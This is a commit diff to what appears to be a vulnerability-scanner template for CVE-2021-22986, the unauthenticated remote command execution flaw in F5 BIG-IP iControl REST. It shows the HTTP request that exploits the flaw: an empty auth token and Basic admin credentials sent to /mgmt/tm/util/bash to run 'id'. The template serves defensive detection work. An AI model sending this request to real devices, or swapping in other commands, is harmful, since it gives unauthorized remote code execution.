Fix CVE-2021-22986.yaml

2021-10-03 12:24:46 +02:00 · 2021-10-03 12:24:46 +02:00 · 5ec6402b7a
parent 037696e353
commit 5ec6402b7a
1 changed files with 8 additions and 15 deletions
--- a/cves/2021/CVE-2021-22986.yaml
+++ b/cves/2021/CVE-2021-22986.yaml
@ -1,7 +1,7 @@
 id: CVE-2021-22986
 info:
  name: F5 BIG-IP iControl REST unauthenticated RCE
-  author: rootxharsh,iamnoooob
+  author: rootxharsh,iamnoooob,swissky
  severity: critical
  tags: bigip,cve,cve2021,rce
  description: The iControl REST interface has an unauthenticated remote command execution vulnerability.
@ -15,25 +15,18 @@ info:

 requests:
  - raw:
-      - |
-        POST /mgmt/shared/authn/login HTTP/1.1
-        Host: {{Hostname}}
-        Accept-Language: en
-        Authorization: Basic YWRtaW46
-        Content-Type: application/json
-        Cookie: BIGIPAuthCookie=1234
-        Connection: close
-
-        {"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}}
      - |
        POST /mgmt/tm/util/bash HTTP/1.1
        Host: {{Hostname}}
-        Accept-Language: en
-        X-F5-Auth-Token: §token§
-        Content-Type: application/json
+        Accept-Encoding: gzip, deflate
+        Accept: */*
        Connection: close
+        Content-Type: application/json
+        X-F5-Auth-Token:
+        Authorization: Basic YWRtaW46
+        Content-Length: 42

-        {"command":"run","utilCmdArgs":"-c id"}
+        {"command": "run", "utilCmdArgs": "-c id"}

    extractors:
      - type: regex